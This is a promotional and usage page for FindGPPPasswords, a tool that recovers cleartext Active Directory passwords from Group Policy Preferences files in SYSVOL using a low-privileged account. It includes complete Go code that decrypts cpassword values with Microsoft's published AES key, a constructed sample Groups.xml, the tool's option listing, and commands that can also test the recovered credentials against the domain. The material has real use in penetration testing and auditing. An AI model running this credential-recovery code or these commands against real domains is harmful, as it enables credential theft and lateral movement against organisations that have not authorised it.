FindGPPPasswords: Uncover Group Policy Preferences Passwords

FindGPPPasswords

A cross-platform tool to find and decrypt Group Policy Preferences passwords from the SYSVOL share using low-privileged domain accounts.

Features

  •  Only requires a low-privileged domain user account.
  •  Automatically retrieves the list of all domain controllers from LDAP.
  •  Finds all Group Policy Preferences passwords present in the SYSVOL share of each domain controller.
  •  Decrypts the passwords and prints them in cleartext.
  •  Outputs to an Excel file with the option --export-xlsx <path_to_xlsx_file>.
  •  Option to test the credentials recovered from the GPP passwords with the --test-credentials option.
  •  Multi-threaded mode with the option --threads <number_of_threads>.
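To make the "find and decrypt" steps above concrete, here is an added Go example; it is not code from FindGPPPasswords or from its author. It does what a GPP password finder has to do once it has a preference XML file from SYSVOL: walk the document for every element carrying a cpassword attribute (together with the userName, runAs or accountName on the same element), strip the base64 that GPP stores without padding, decrypt with the AES-256 key Microsoft published in MS-GPPREF, validate the PKCS#7 padding, and decode the UTF-16LE plaintext. The Groups.xml, the svc_backup account and its password are constructed for this example, and EncryptCPassword exists only to build that sample. The walker generalizes beyond Groups.xml: the same attribute appears in Services.xml, ScheduledTasks.xml, DataSources.xml, Drives.xml and Printers.xml, so it looks at every element rather than a fixed schema.

```go
package main

import (
	"bytes"
	"crypto/aes"
	"crypto/cipher"
	"encoding/base64"
	"encoding/xml"
	"fmt"
	"io"
	"strings"
	"unicode/utf16"
)

// AES-256 key Microsoft published in MS-GPPREF 2.2.1.1.4, used with CBC and
// an all-zero IV: anyone who can read SYSVOL can decrypt every cpassword.
var gppKey = []byte{
	0x4e, 0x99, 0x06, 0xe8, 0xfc, 0xb6, 0x6c, 0xc9, 0xfa, 0xf4, 0x93, 0x10, 0x62, 0x0f, 0xfe, 0xe8,
	0xf4, 0x96, 0xe8, 0x06, 0xcc, 0x05, 0x79, 0x90, 0x20, 0x9b, 0x09, 0xa4, 0x33, 0xb6, 0x6c, 0x1b,
}

// Credential is one cpassword attribute and the account named on the same element.
type Credential struct {
	Account   string // userName, runAs or accountName attribute, if present
	CPassword string // raw cpassword attribute value
}

// DecryptCPassword turns a cpassword attribute value into the cleartext password.
func DecryptCPassword(cpassword string) (string, error) {
	// GPP stores cpassword without base64 '=' padding, which RawStdEncoding expects.
	ct, err := base64.RawStdEncoding.DecodeString(strings.TrimRight(cpassword, "="))
	if err != nil {
		return "", fmt.Errorf("cpassword is not valid base64: %w", err)
	}
	if len(ct) == 0 || len(ct)%aes.BlockSize != 0 {
		return "", fmt.Errorf("ciphertext of %d bytes is not whole AES blocks", len(ct))
	}
	block, _ := aes.NewCipher(gppKey) // cannot fail: the key is a fixed 32 bytes
	pt := make([]byte, len(ct))
	cipher.NewCBCDecrypter(block, make([]byte, aes.BlockSize)).CryptBlocks(pt, ct)
	// Check the PKCS#7 padding rather than guessing; the plaintext is a
	// UTF-16LE wide string, so what remains must have even length.
	pad := int(pt[len(pt)-1])
	if pad == 0 || pad > aes.BlockSize || (len(pt)-pad)%2 != 0 ||
		!bytes.Equal(pt[len(pt)-pad:], bytes.Repeat([]byte{byte(pad)}, pad)) {
		return "", fmt.Errorf("bad PKCS#7 padding or odd-length plaintext")
	}
	u := make([]uint16, (len(pt)-pad)/2)
	for i := range u {
		u[i] = uint16(pt[2*i]) | uint16(pt[2*i+1])<<8
	}
	return string(utf16.Decode(u)), nil
}

// EncryptCPassword is the inverse transform; it only builds the constructed
// sample file below (real files are written by the Group Policy editor).
func EncryptCPassword(plain string) string {
	var pt []byte
	for _, c := range utf16.Encode([]rune(plain)) {
		pt = append(pt, byte(c), byte(c>>8))
	}
	pad := aes.BlockSize - len(pt)%aes.BlockSize
	pt = append(pt, bytes.Repeat([]byte{byte(pad)}, pad)...)
	block, _ := aes.NewCipher(gppKey)
	ct := make([]byte, len(pt))
	cipher.NewCBCEncrypter(block, make([]byte, aes.BlockSize)).CryptBlocks(ct, pt)
	return base64.RawStdEncoding.EncodeToString(ct)
}

// FindCPasswords walks any preference XML (Groups.xml, Services.xml, ScheduledTasks.xml,
// DataSources.xml, Drives.xml, Printers.xml) and returns every element with a cpassword.
func FindCPasswords(doc []byte) ([]Credential, error) {
	dec := xml.NewDecoder(bytes.NewReader(doc))
	var found []Credential
	for {
		tok, err := dec.Token()
		if err == io.EOF {
			return found, nil
		} else if err != nil {
			return nil, err
		}
		if se, ok := tok.(xml.StartElement); ok {
			var c Credential
			for _, a := range se.Attr {
				switch a.Name.Local {
				case "cpassword":
					c.CPassword = a.Value
				case "userName", "runAs", "accountName":
					c.Account = a.Value
				}
			}
			if c.CPassword != "" {
				found = append(found, c)
			}
		}
	}
}

// SampleGroupsXML is a constructed Groups.xml in the layout GPP writes under
// Policies\<GUID>\Machine\Preferences\Groups\ in SYSVOL; account and password are invented.
func SampleGroupsXML() []byte {
	return []byte(fmt.Sprintf(`<?xml version="1.0" encoding="utf-8"?>
<Groups>
  <User name="svc_backup" changed="2024-01-01 00:00:00">
    <Properties action="U" userName="svc_backup" cpassword="%s" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0"/>
  </User>
</Groups>`, EncryptCPassword("Winter2024!")))
}

func main() {
	creds, err := FindCPasswords(SampleGroupsXML())
	if err != nil {
		panic(err)
	}
	for _, c := range creds {
		pw, err := DecryptCPassword(c.CPassword)
		fmt.Printf("%-15s %q %v\n", c.Account, pw, err)
	}
}
```

Run with `go run .` and it prints the constructed account with its recovered password. Against a real domain the input would be the XML files read over SMB from `\\<dc>\SYSVOL\<domain>\Policies\<GUID>\{Machine,User}\Preferences\`, which is what the tool's DC enumeration and SYSVOL walk feed into the same decryption. The key in the block is the one Microsoft documented in MS-GPPREF; MS14-025 stopped the Group Policy editor from writing new cpassword values but did not remove existing ones from SYSVOL, which is why they are still found years later. The decryptor deliberately rejects malformed padding and odd-length plaintext instead of returning garbage, so a truncated or hand-edited cpassword shows up as an error rather than as a wrong password that then fails a credential test.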

Use

$ ./FindGPPPasswords -h
FindGPPPasswords - by Remi GASCOU (Podalirius) @ TheManticoreProject - v1.2

Usage: FindGPPPasswords [--quiet] [--debug] [--no-colors] [--export-xlsx <string>] [--test-credentials] --domain <string> --username <string> [--password <string>] [--hashes <string>] [--threads <int>] [--nameserver <string>] --dc-ip <string> [--ldap-port <tcp port>] [--use-ldaps]

-q, --quiet Show no information at all. (default: false)
-d, --debug Debug mode. (default: false)
-nc, --no-colors No colors mode. (default: false)

Additional Options:
-x, --export-xlsx <string> Path to output Excel file. (default: "")
-tc, --test-credentials Test credentials. (default: false)

Authentication:
-d, --domain <string> Active Directory domain to authenticate to.
-u, --username <string> User to authenticate as.
-p, --password <string> Password to authenticate with. (default: "")
-H, --hashes <string> NT/LM hashes, format is LMhash:NThash. (default: "")
-T, --threads <int> Number of threads to use. (default: 0)

DNS Settings:
-ns, --nameserver <string> IP Address of the DNS server to use in the queries. If omitted, it will use the IP of the domain controller specified in the -dc parameter. (default: "")

LDAP Connection Settings:
-dc, --dc-ip <string> IP Address of the domain controller or KDC (Key Distribution Center) for Kerberos. If omitted, it will use the domain part (FQDN) specified in the identity parameter.
-lp, --ldap-port <tcp port> Port number to connect to LDAP server. (default: 389)
-L, --use-ldaps Use LDAPS instead of LDAP. (default: false)

Example

By default, the tool only finds the GPP passwords and prints them in cleartext:

./FindGPPPasswords-linux-amd64 --domain <domain> --username <username> --password <password>

The --test-credentials option additionally tests the credentials recovered from the GPP passwords:

./FindGPPPasswords-linux-amd64 --test-credentials --domain <domain> --username <username> --password <password>

Download